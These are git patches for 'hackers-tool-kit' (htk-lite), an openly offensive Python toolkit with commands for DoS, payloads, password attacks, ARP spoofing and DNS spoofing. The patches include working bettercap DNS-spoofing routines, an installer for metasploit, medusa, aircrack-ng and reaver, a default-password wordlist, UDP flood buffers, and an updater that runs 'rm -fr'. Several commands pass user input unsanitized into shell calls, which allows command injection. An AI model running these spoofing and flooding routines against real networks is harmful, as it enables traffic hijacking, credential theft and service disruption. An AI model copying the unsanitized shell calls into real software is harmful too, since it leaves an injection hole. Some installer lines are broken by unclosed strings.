DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] + except: + print "\n" +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("\033[1mhit enter to stop server:\033[0m ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") + +def terminal(): + os.system("gnome-terminal") + +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + +def main(): + found = False + while not found: + try: + x = raw_input('\033[0mHTK{0}{1}\033[0mLite: '.format(random.choice(colorlist), random.choice(inputlist))) + + if x == "clear": + os.system("clear") + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + + if x == "banner": + mainbanner() + if x == "?": + helpbanner() + if x == "infoscan": + infoscan() + if x == "infoscan -o": + specscan() + if x == "dos": + dos() + if x == "payload": + payload() + if x == "password": + password() + if x == "reboot": + reboot() + if x == "monitor on": + monitoron() + if x == "monitor off": + monitoroff() + if x == "command": + command() + if x == "anon on": + anonon() + if x == "anon off": + anonoff() + if x == "sysinfo": + sysinfo() + if x == "netscan": + netscan() + if x == "verscan": + verscan() + if x == "wordlist": + wordlist() + if x == "arpspoof": + arpspoof() + if x == "traff": + traff() + if x == "hashid": + hashid() + if x == "aserver": + aserver() + if x == "terminal": + terminal() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoof --all": + dnsspoofall() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True +try: + if len(sys.argv) < 2: + starting() + print "{0}Welc{1}ome T{2}o Hacke{3}rs-Too{4}l-Kit{5} Lite\033[0m".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + time.sleep(1.8) + mainbanner() + main() + if sys.argv[1] == "-h": + print """ +-------------------------------------------------------------- +-h : this menu + +--commandsearch : search for specific commands + +--commandinfo : more info about the commands + +--commandcount : see how many commands are available + +--run : run a command in htk-lite from the terminal + +--proxy : run htkl with proxychains + +--quickrun : run htkl without starting menu +-------------------------------------------------------------- + """ + if sys.argv[1] == "--run": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + os.system("python commandlist/{0}.py".format(sys.argv[2])) + main() + if sys.argv[1] == "--commandcount": + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + if b == "1": + print "(\033[32m{0}\033[0m) Command is available".format(b) + else: + print "(\033[32m{0}\033[0m) Commands are available".format(b) + if sys.argv[1] == "--proxy": + os.system("service tor restart") + os.system("proxychains python htkl.py") + + if sys.argv[1] == "--quickrun": + mainbanner() + main() + + if sys.argv[1] == "--commandinfo": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + try: + command = os.popen('cat commandinfo/{0}.txt'.format(sys.argv[2])).read() + print command + except: + print "No command named {0} available".format(command) + + if sys.argv[1] == "--commandsearch": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + command = os.popen('find commandlist -name "*{0}*"'.format(sys.argv[2])).read() + a = command.replace('commandlist/', '') + b = a.replace('.py', '') + c = b.replace('commandlist', '') + + print "Commands Found Matching '{0}':\n".format(sys.argv[2]) + print c +except: + os.system("") diff --git a/htk-lite/htklupdate.py b/htk-lite/htklupdate.py new file mode 100644 index 0000000..2477b13 --- /dev/null +++ b/htk-lite/htklupdate.py @@ -0,0 +1,4 @@ +import os +print "UPDATING..." +os.system("cd") +os.system('cd /root/ && rm -fr htk-lite && git clone https://github.com/unkn0wnh4ckr/htk-lite && echo "[UPDATED]: Restart Your Terminal"') diff --git a/htk-lite/install.py b/htk-lite/install.py new file mode 100644 index 0000000..9650f6c --- /dev/null +++ b/htk-lite/install.py @@ -0,0 +1,51 @@ +import os +def install(): + os.system("apt update") + os.system("apt install dirb -y") + os.system("apt install bettercap -y") + os.system("apt install sslscan -y") + os.system("apt install crunch -y") + os.system("apt install tcpdump -y") + os.system("apt install macchanger -y") + os.system("apt install wafw00f -y") + os.system("apt install medusa -y") + os.system("pip install future") + os.system("pip install mechanize") + os.system("pip install json") + os.system("pip install whois") + os.system("pip install python-whois") + os.system("pip install requests") + os.system("pip install bs4") + os.system("pip install requests[socks]") + os.system("pip install urlparse") + os.system("pip install cookielib") + os.system("pip install scapy + os.system("pip install datetime + os.system("pip install argparse") + os.system("pip install re") + os.system("pip install threading") + os.system("pip install urllib2") + os.system("pip install modules") + os.system("pip install builtwith") + os.system("pip install smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install neofetch -y") + os.system("apt install cupp -y") + os.system("gem install lolcat") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + +install() diff --git a/htk-lite/wordlists/example.txt b/htk-lite/wordlists/example.txt new file mode 100644 index 0000000..3bdd442 --- /dev/null +++ b/htk-lite/wordlists/example.txt @@ -0,0 +1,10 @@ +password +123456 +123 +password123 +admin +root +toor +username +qwerty +PASSWORD From eaa7e8a2e59f775cfa0933cce35252b1f8ad8510 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 13:36:45 +0000 Subject: [PATCH 204/214] Delete install.py --- htk-lite/install.py | 51 --------------------------------------------- 1 file changed, 51 deletions(-) delete mode 100644 htk-lite/install.py diff --git a/htk-lite/install.py b/htk-lite/install.py deleted file mode 100644 index 9650f6c..0000000 --- a/htk-lite/install.py +++ /dev/null @@ -1,51 +0,0 @@ -import os -def install(): - os.system("apt update") - os.system("apt install dirb -y") - os.system("apt install bettercap -y") - os.system("apt install sslscan -y") - os.system("apt install crunch -y") - os.system("apt install tcpdump -y") - os.system("apt install macchanger -y") - os.system("apt install wafw00f -y") - os.system("apt install medusa -y") - os.system("pip install future") - os.system("pip install mechanize") - os.system("pip install json") - os.system("pip install whois") - os.system("pip install python-whois") - os.system("pip install requests") - os.system("pip install bs4") - os.system("pip install requests[socks]") - os.system("pip install urlparse") - os.system("pip install cookielib") - os.system("pip install scapy - os.system("pip install datetime - os.system("pip install argparse") - os.system("pip install re") - os.system("pip install threading") - os.system("pip install urllib2") - os.system("pip install modules") - os.system("pip install builtwith") - os.system("pip install smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install neofetch -y") - os.system("apt install cupp -y") - os.system("gem install lolcat") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - -install() From c7adb89bb8e0942a15e09b126b5ee733a30a8857 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 09:02:50 -0500 Subject: [PATCH 205/214] Update README.md --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index c40c193..99f262c 100644 --- a/README.md +++ b/README.md @@ -46,4 +46,7 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates -* added a option to compile c files (compilec option) +* added a htk-lite option which runs my htk-lite tool + + +* added a dns spoofing option From a14b4137d08aa9a78aadf56bf5a5748de1b7835c Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 3 Dec 2019 20:19:17 +0000 Subject: [PATCH 206/214] Delete htk.py --- htk.py | 3284 -------------------------------------------------------- 1 file changed, 3284 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index ca9114b..0000000 --- a/htk.py +++ /dev/null @@ -1,3284 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @tuf_unkn0wn -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -import readline -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - 